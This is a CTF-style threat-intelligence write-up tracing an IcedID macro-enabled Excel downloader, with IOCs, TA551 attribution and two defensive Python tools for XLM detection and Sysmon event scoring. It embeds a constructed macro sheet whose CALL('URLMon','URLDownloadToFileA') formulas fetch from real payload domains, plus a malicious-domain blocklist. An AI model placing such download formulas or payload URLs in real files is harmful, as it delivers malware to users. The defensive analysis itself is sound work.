Threat Intelligence Analysis: IcedID — Tracking a Macro-Enabled Document Delivery Chain

Platform: CyberDefenders
Challenge: IcedID
Category: Threat Intelligence
Difficulty: Easy
Tools: VirusTotal, Malpedia, X (Twitter), Tria.ge, ANY.RUN
Achievement: Proof of Completion

1. Executive Summary

Incident Type: Malware Delivery / Banking Trojan / Threat Intelligence Pivot

Malware Family: IcedID (BokBot)

A suspicious file was flagged during threat intelligence triage. Using open-source threat intelligence platforms — VirusTotal, Tria.ge, Malpedia, and ANY.RUN — the investigation confirmed the file as a macro-enabled Excel document weaponized with XLM 4.0 macros. The document serves as a first-stage loader for the IcedID (also known as BokBot) banking trojan. The delivery infrastructure utilizes multiple compromised domains serving payloads disguised as GIF files, and the campaign is attributed to the financially motivated threat group TA551 (also tracked as GOLD CABIN / Shathak).

Indicators of Compromise (IOCs)

| Type | Indicator | Description |
|---|---|---|
| Malware Hash (SHA-1) | 191eda0c539d284b29efe556abb05cd75a9077a0 | Initial hash submitted for analysis |
| Malware Hash (SHA-256) | d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d | Full SHA-256 of the malicious XLSX |
| File Name | document-1982481273.xlsm | Social-engineered document filename |
| Payload URL (1) | metaflip[.]io/ds/3003.gif | XLM macro payload download URL |
| Payload URL (2) | partsapp[.]com[.]br/ds/3003.gif | Redundant payload download URL |
| Payload URL (3) | columbia[.]aula-web[.]net/ds/3003.gif | Redundant payload download URL |
| Payload URL (4) | tajushariya[.]com/ds/3003.gif | Redundant payload download URL |
| Payload URL (5) | agenbolatermurah[.]com/ds/3003.gif | Redundant payload download URL |
| Dropped File | ksjvoefv.skd | Renamed payload dropped to disk |
| Domain Registrar | NameCheap, Inc. | Registrar used for C2 domain infrastructure |
| Threat Group | TA551 (G0127) / GOLD CABIN / Shathak | Attribution via MITRE ATT&CK |
| Macro Language | XLM 4.0 | Legacy Excel macro language used for evasion |

MITRE ATT&CK Mapping Overview

| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Execution | User Execution: Malicious File | T1204.002 |
| Execution | Command and Scripting Interpreter: XLM Macros | T1059 |
| Defense Evasion | Masquerading: Match Legitimate Name (.gif extension) | T1036.005 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Command & Control | Ingress Tool Transfer | T1105 |

2. Background: The IcedID Delivery Model

IcedID (also known as BokBot) is a modular banking trojan that first emerged in 2017. While originally designed for credential theft and web injection against financial institutions, it has evolved into a versatile initial access broker — frequently delivering secondary payloads like Cobalt Strike, Conti ransomware, and other post-exploitation frameworks.

| Component | Description | Forensic Significance |
|---|---|---|
| XLM 4.0 Macros | Legacy Excel macro language predating VBA | Evades many modern AV/EDR solutions that focus on VBA analysis |
| Staged Payload Download | Multiple redundant URLs serving the same payload | Ensures delivery even if individual domains are blocked |
| .gif Extension Masquerading | Payloads served with image file extensions | Bypasses file-type-based web proxies and URL filters |
| TA551 / Shathak | Financially motivated threat group (MITRE G0127) | Known for high-volume email campaigns distributing IcedID and other loaders |

Why This Matters: IcedID’s use of XLM 4.0 macros instead of modern VBA is a deliberate evasion technique. Many security tools and sandboxes focus their macro analysis on VBA, leaving XLM macros — a 30-year-old technology — as a blind spot. Analysts must ensure their analysis tools support XLM macro extraction (e.g., olevba, XLMMacroDeobfuscator).


3. Phase 1: Initial Sample Triage — VirusTotal Analysis (Questions 1–4)

Objective: Identify the malware family, file type, threat labels, and delivery filenames using VirusTotal.

The investigation begins with the provided SHA-1 hash 191eda0c539d284b29efe556abb05cd75a9077a0. Submitting this hash to VirusTotal immediately reveals the sample’s reputation and classification.

VirusTotal detection page showing 44 out of 65 security vendors flagging the file as malicious. The SHA-256 hash is d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d. The file is 105.53 KB in XLSX format. Popular threat label is trojan.x97m/docdl. Threat categories show trojan and downloader. Family labels include x97m, docdl, and icedid.

Key findings from VirusTotal:

  • 44/65 vendors flag the file as malicious — extremely high consensus
  • Popular threat label: trojan.x97m/docdl — the x97m prefix indicates Excel macro content
  • Family labels: x97m, docdl, icedid — confirming this is an IcedID downloader
  • File size: 105.53 KB — small enough to evade size-based email filters

The Details tab reveals the various filenames this sample has been observed under:

VirusTotal Names section showing five filenames associated with this hash: the full SHA-256 as .xlsx, sample_04.xlsx, 717.xlsx, and document-1982481273.xlsm — the last filename highlighted as the social-engineered delivery name.

The filename document-1982481273.xlsm is a classic social engineering pattern — a generic “document” prefix followed by a random number, designed to look like an auto-generated file from a legitimate business system (e.g., invoice processing, document management).

Identifying Dropped Files

The Behavior tab in VirusTotal reveals the files dropped to disk when the macro executes:

VirusTotal Behavior tab showing Files Dropped section with GUIDs (31AC010A..., D8B36893...) and the key dropped file at c:\users\xxx\ksjvoefv.skd, alongside cached .gif files in the INetCache directory.

The macro downloads payloads disguised as .gif files (cached in inetcache\ie\) and renames them to .skd files on disk. The filename ksjvoefv.skd is the final payload dropped to the user’s profile directory — a randomized name with a non-standard extension designed to avoid detection by filename-based rules.

Answer Q1

What is the malware family classification for the file?

IcedID

Answer Q2

What is the file type of the malicious sample?

xlsx

Answer Q3

What is the document file name used for social engineering?

document-1982481273.xlsm

Answer Q4

What is the name of the file dropped to disk?

ksjvoefv.skd


4. Phase 2: Infrastructure Analysis — Contacted URLs & Download Chain (Questions 5 & 6)

Objective: Map the download infrastructure used by the macro to retrieve the IcedID payload.

The Relations tab in VirusTotal reveals the external URLs the macro contacts when executed. This provides a complete picture of the attacker’s delivery infrastructure:

VirusTotal Contacted URLs section showing 8 URLs. Multiple domains serve the same path ds/3003.gif, including metaflip.io, partsapp.com.br, columbia.aula-web.net, tajushariya.com, and agenbolatermurah.com. Detection ratios range from 10/91 to 14/93. Two legitimate URLs (aws.amazon.com and x1.i.lencr.org) appear as noise.

Five different compromised domains all serve the same payload path (/ds/3003.gif), providing redundancy — if one domain is taken down, the macro simply falls back to the next URL in the CALL sequence. The .gif extension is a deliberate masquerade: these are not image files but rather the IcedID DLL payload renamed to bypass URL filtering rules that block executable downloads.

Sandbox Confirmation via Tria.ge

Cross-referencing the sample on Tria.ge (Recorded Future Sandbox) confirms the XLM macro source code and the exact download CALL sequence:

Tria.ge sandbox analysis overview showing the sample document-971744317.xlsm scored 10/10 (maximum maliciousness). Tags include ICEDID, BANKER, LOADER, MACRO, TROJAN, XLM. The Malware Config section shows extracted XLM 4.0 source code with five sequential CALL("URLMon", "URLDownloadToFileA") instructions downloading from each compromised domain to .skd files.

The extracted XLM macro source confirms the delivery mechanism:

  1. CALL("URLMon", "URLDownloadToFileA") — Uses the Windows URLMon COM object to download files
  2. Each call targets a different compromised domain with the same path /ds/3003.gif
  3. Downloaded files are saved locally as ..\ksjvoefv.skd, ..\ksjvoefv.skd1, ..\ksjvoefv.skd2, etc.

Analyst Note: The use of URLDownloadToFileA from XLM macros is a well-known technique. Detection engineers should create Sigma/YARA rules targeting Excel processes (excel.exe) making outbound HTTP connections via urlmon.dll — this is almost never legitimate in an enterprise environment.
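The CALL sequence above, and the tooling note in section 2, both depend on the analyst actually being able to see Excel 4.0 macro sheets, which a VBA-only scanner never opens. The following Python is an added example, not code from the write-up, from CyberDefenders or from any sandbox vendor: it builds a constructed, minimal .xlsm-style package whose macro sheet carries formulas in the same shape as the CALL("URLMon", "URLDownloadToFileA") sequence reported above, checks whether the package declares Excel 4.0 macro sheets at all, then pulls the download URLs and local drop paths out of the formulas and defangs them for a report. The part layout (xl/macrosheets/ declared with the macrosheet+xml content type) is the OOXML convention as I understand it, the "JJCCBB" type string and argument order in the constructed formulas are assumptions about the CALL signature, and the URLs and drop paths are the ones from this write-up.

```python
"""Triage an OOXML workbook for Excel 4.0 (XLM) macro sheets and pull IOCs from them."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, urlunsplit

# Layout assumption: OOXML stores XLM 4.0 macro sheets as parts under xl/macrosheets/
# declared with this content type in [Content_Types].xml (VBA lives in xl/vbaProject.bin,
# which is the only part a VBA-focused scanner would look at).
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
SS_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Constructed sample: two download CALLs in the shape the sandbox reported, then HALT().
# The "JJCCBB" type string and argument order are assumptions about the CALL signature.
SAMPLE_MACROSHEET = """<?xml version="1.0" encoding="UTF-8"?>
<macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData>
    <row r="1"><c r="A1"><f>CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://metaflip.io/ds/3003.gif","..\\ksjvoefv.skd",0,0)</f></c></row>
    <row r="2"><c r="A2"><f>CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://partsapp.com.br/ds/3003.gif","..\\ksjvoefv.skd1",0,0)</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</macrosheet>
"""


def build_sample_workbook(with_xlm: bool = True) -> bytes:
    """Build a minimal in-memory .xlsm-style archive (constructed, not the real sample)."""
    overrides = ['<Override PartName="/xl/workbook.xml" '
                 'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>']
    if with_xlm:
        overrides.append(f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>')
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>\n'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     + "".join(overrides) + "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", f'<workbook xmlns="{SS_NS}"/>')
        if with_xlm:
            zf.writestr("xl/macrosheets/sheet1.xml", SAMPLE_MACROSHEET)
    return buf.getvalue()


def has_xlm_macros(data: bytes) -> bool:
    """True if the package contains or declares an Excel 4.0 macro sheet."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if any(n.startswith("xl/macrosheets/") for n in names):
            return True
        if "[Content_Types].xml" in names:
            return MACROSHEET_CT in zf.read("[Content_Types].xml").decode("utf-8", "replace")
    return False


def extract_xlm_formulas(data: bytes) -> list:
    """Return every <f> formula text found in macro sheets, in sheet/row order."""
    formulas = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in sorted(zf.namelist()):
            if name.startswith("xl/macrosheets/") and name.endswith(".xml"):
                root = ET.fromstring(zf.read(name))
                for f in root.iter(f"{{{SS_NS}}}f"):
                    if f.text:
                        formulas.append(f.text)
    return formulas


URL_RE = re.compile(r'https?://[^"\s]+')
STRING_ARG_RE = re.compile(r'"([^"]*)"')


def extract_iocs(formulas: list) -> dict:
    """Pull download URLs and local drop paths out of CALL(...URLDownloadToFileA...) formulas."""
    urls, drop_paths, uses_urldownload = [], [], False
    for f in formulas:
        if "URLDownloadToFile" in f:
            uses_urldownload = True
        urls.extend(URL_RE.findall(f))
        # A quoted argument containing a backslash is treated as a local destination path.
        drop_paths.extend(s for s in STRING_ARG_RE.findall(f) if "\\" in s)
    return {"urls": urls, "drop_paths": drop_paths, "uses_urldownload": uses_urldownload}


def defang(url: str) -> str:
    """Render a URL safe to paste into a report: hxxp scheme, [.] in the host only."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme.replace("http", "hxxp"), parts.netloc.replace(".", "[.]"),
                       parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    sample = build_sample_workbook()
    print("XLM macros present:", has_xlm_macros(sample))
    iocs = extract_iocs(extract_xlm_formulas(sample))
    for u in iocs["urls"]:
        print("download:", defang(u))
    for p in iocs["drop_paths"]:
        print("drop path:", p)
```

The presence check is the part worth wiring into an email or file-scanning pipeline: a macro-enabled workbook with no vbaProject.bin but with a macrosheets part is exactly the sample a VBA-only rule misses. The formula extraction only works on formulas stored in clear; real campaigns usually obfuscate them (T1027 in the mapping above), at which point a deobfuscator such as XLMMacroDeobfuscator, mentioned in section 2, is needed to recover the CALL arguments.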

Answer Q5

How many URLs did the malware contact?

8

Answer Q6

What is the registrar used for the domain infrastructure?

NameCheap, Inc.


5. Phase 3: Threat Attribution — MITRE ATT&CK & Malpedia (Questions 7 & 8)

Objective: Attribute the campaign to a known threat actor using open-source threat intelligence frameworks.

WHOIS Pivot on C2 Domains

Examining the WHOIS history for one of the payload domains (tajushariya.com) reveals consistent registration through NameCheap, Inc. — a registrar frequently used by threat actors due to its low cost and minimal verification requirements:

![Historical WHOIS lookups for tajushariya.com showing 27 records. The registrar is consistently NAMECHEAP INC / NameCheap, Inc. across all entries dating back to 2023. Registrant IDs alternate between 12dab2e482f2c209 (IS) and 3b5f76ecd769308f (US).](/assets/IcedID%20Lab/Pasted%20image%2020260618235208.png)

Threat Actor Attribution via Malpedia & MITRE ATT&CK

Pivoting to Malpedia and the MITRE ATT&CK framework, IcedID is cataloged as software S0483. The “Groups That Use This Software” section directly links IcedID to two threat groups:

MITRE ATT&CK software page for IcedID showing the "Groups That Use This Software" table. Two entries: G0127 (TA551) and G1038 (TA578).

TA551 (MITRE ID: G0127, also known as GOLD CABIN and Shathak) is a financially motivated threat group active since at least 2018. They are known for high-volume email-based malware distribution campaigns targeting English, German, Italian, and Japanese speakers.

Malpedia page for TA551 (MITRE G0127) showing the group profile: financially-motivated threat group active since at least 2018, primarily targeting English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. Associated groups listed as GOLD CABIN and Shathak. Created 19 March 2021, last modified 16 April 2025.

Answer Q7

What threat group is associated with IcedID distribution?

TA551

Answer Q8

What is the MITRE ATT&CK group ID for the associated threat actor?

G0127


6. Reconstructed Attack Flow

Based on the multi-platform threat intelligence analysis, we can reconstruct the complete IcedID delivery chain:

| Step | Kill Chain Phase | Action | Evidence Source |
|---|---|---|---|
| 1 | Weaponization | TA551 creates document-1982481273.xlsm with embedded XLM 4.0 macros | Tria.ge macro extraction |
| 2 | Delivery | Document delivered via spearphishing email attachment | TA551 known TTP (Malpedia) |
| 3 | Exploitation | Victim opens document and enables macros | User execution required |
| 4 | Installation | XLM macro calls URLDownloadToFileA to download 3003.gif from 5 redundant domains | VirusTotal Contacted URLs |
| 5 | Installation | Payload saved as ksjvoefv.skd in user profile directory | VirusTotal Behavior → Dropped Files |
| 6 | C2 | IcedID DLL loaded, begins C2 communication for banking credential theft | IcedID known behavior (Malpedia) |

Key Observation: The attack chain relies entirely on social engineering — there are no software exploits involved. The XLM macro only executes if the user manually clicks “Enable Content.” However, the 44/65 VirusTotal detection rate means many enterprise AV solutions do detect this sample. The real danger lies in campaigns using fresher variants with lower detection rates, delivered within hours of compilation before AV signatures are updated.


7. Conclusion

The IcedID investigation demonstrates a complete threat intelligence workflow — from hash submission to threat actor attribution. Key findings:

  1. Malware Family: IcedID (BokBot) banking trojan, delivered via a macro-enabled Excel document (document-1982481273.xlsm).
  2. Evasion Technique: XLM 4.0 macros used instead of VBA to evade modern macro analysis tools.
  3. Delivery Infrastructure: Five compromised domains serving identical payloads at /ds/3003.gif with .gif extension masquerading.
  4. Attribution: Campaign attributed to TA551 (G0127 / GOLD CABIN / Shathak) — a prolific financially motivated threat group.
  5. Registrar Pattern: All C2 domains registered through NameCheap, Inc.

Key Takeaways for the SOC:

  1. Block the identified payload URLs and their parent domains at the web proxy and DNS sinkhole level. Add all 5 compromised domains to the blocklist immediately.
  2. Deploy XLM macro detection rules — many organizations disable VBA macros via Group Policy but forget that XLM 4.0 macros are a separate, older technology that must be disabled independently (Excel > Trust Center > Macro Settings > Disable Excel 4.0 macros).
  3. Hunt for urlmon.dll activity from Office processes — Sigma rules detecting excel.exe or winword.exe loading urlmon.dll and making outbound HTTP connections are a reliable detection for macro-based downloaders.
  4. Monitor for NameCheap-registered domains in newly observed DNS queries — while NameCheap is legitimate, its prevalence in threat actor infrastructure makes it a useful enrichment signal when combined with other indicators.
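Takeaways 1 and 3 above, together with the analyst note in section 4, describe a detection that can be expressed directly over endpoint telemetry. The Python below is an added example, not the write-up's own content and not any vendor's rule: it scores constructed Sysmon-style events (image load, network connect, file create) per process, weighting an Office process that loads urlmon.dll, that connects out (more heavily when the destination is one of the five domains from the IOC table), and that writes a file with an unexpected extension under a user profile, then raises an alert only when the combined score for one process crosses a threshold. The event field names, the weights, the expected-extension list and the threshold are my assumptions; the domains and the dropped filename come from this page.

```python
"""Score Sysmon-style endpoint events for the Office-macro downloader pattern."""
import ntpath
from collections import defaultdict

OFFICE_PROCS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Payload domains from the write-up's IOC table, used here as the proxy/DNS blocklist.
BLOCKLIST = {"metaflip.io", "partsapp.com.br", "columbia.aula-web.net",
             "tajushariya.com", "agenbolatermurah.com"}
# Extensions an Office process is expected to write under a user profile (assumption).
EXPECTED_EXT = {".xlsx", ".xlsm", ".xls", ".docx", ".doc", ".pptx", ".tmp", ".lnk", ".xml"}
ALERT_THRESHOLD = 3

EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
# Constructed events in a simplified Sysmon shape: 7 = ImageLoad, 3 = NetworkConnect, 11 = FileCreate.
SAMPLE_EVENTS = [
    {"event_id": 7, "pid": 4120, "image": EXCEL, "image_loaded": r"C:\Windows\System32\urlmon.dll"},
    {"event_id": 3, "pid": 4120, "image": EXCEL, "dest_hostname": "metaflip.io", "dest_port": 80},
    {"event_id": 11, "pid": 4120, "image": EXCEL, "target_filename": r"C:\Users\xxx\ksjvoefv.skd"},
    {"event_id": 7, "pid": 9001, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image_loaded": r"C:\Windows\System32\urlmon.dll"},
    {"event_id": 3, "pid": 5150, "image": EXCEL, "dest_hostname": "aws.amazon.com", "dest_port": 443},
    {"event_id": 11, "pid": 5150, "image": EXCEL, "target_filename": r"C:\Users\xxx\Documents\budget.xlsx"},
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def is_office_process(event: dict) -> bool:
    return _basename(event.get("image", "")) in OFFICE_PROCS


def rule_office_loads_urlmon(event: dict) -> int:
    """Office process loading urlmon.dll: weak alone, strong together with the other two."""
    if (event["event_id"] == 7 and is_office_process(event)
            and _basename(event.get("image_loaded", "")) == "urlmon.dll"):
        return 1
    return 0


def rule_office_network(event: dict) -> int:
    """Outbound connection from an Office process; a blocklisted destination scores higher."""
    if event["event_id"] != 3 or not is_office_process(event):
        return 0
    return 3 if event.get("dest_hostname", "").lower() in BLOCKLIST else 1


def rule_office_drops_unusual_file(event: dict) -> int:
    """Office process writing a non-document extension under C:\\Users (e.g. the .skd drop)."""
    if event["event_id"] != 11 or not is_office_process(event):
        return 0
    target = event.get("target_filename", "")
    ext = ntpath.splitext(target)[1].lower()
    if target.lower().startswith(r"c:\users") and ext not in EXPECTED_EXT:
        return 2
    return 0


RULES = {
    "office_loads_urlmon": rule_office_loads_urlmon,
    "office_network": rule_office_network,
    "office_drops_unusual_file": rule_office_drops_unusual_file,
}


def score_events(events: list) -> dict:
    """Aggregate rule weights per pid; returns {pid: {"score": int, "rules": [names]}}."""
    scores = defaultdict(lambda: {"score": 0, "rules": []})
    for event in events:
        for name, rule in RULES.items():
            weight = rule(event)
            if weight:
                entry = scores[event["pid"]]
                entry["score"] += weight
                if name not in entry["rules"]:
                    entry["rules"].append(name)
    return dict(scores)


def alerts(events: list, threshold: int = ALERT_THRESHOLD) -> dict:
    """Processes whose combined score meets the threshold, with the rules that fired."""
    return {pid: e for pid, e in score_events(events).items() if e["score"] >= threshold}


if __name__ == "__main__":
    for pid, entry in alerts(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid} score={entry['score']} rules={', '.join(entry['rules'])}")
```

Scoring per process rather than alerting on any single event is the design choice that keeps this usable: an Excel instance that only talks to a cloud endpoint (pid 5150 in the sample) scores 1 and stays quiet, while the instance that loads urlmon.dll, reaches a blocklisted domain and writes ksjvoefv.skd under the profile scores 6 and fires with all three rule names attached, which is what an analyst needs to triage it quickly.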

Analysis Date: June 21, 2026
Analyst: El OMARI Zakaria

This post is licensed under CC BY 4.0 by the author.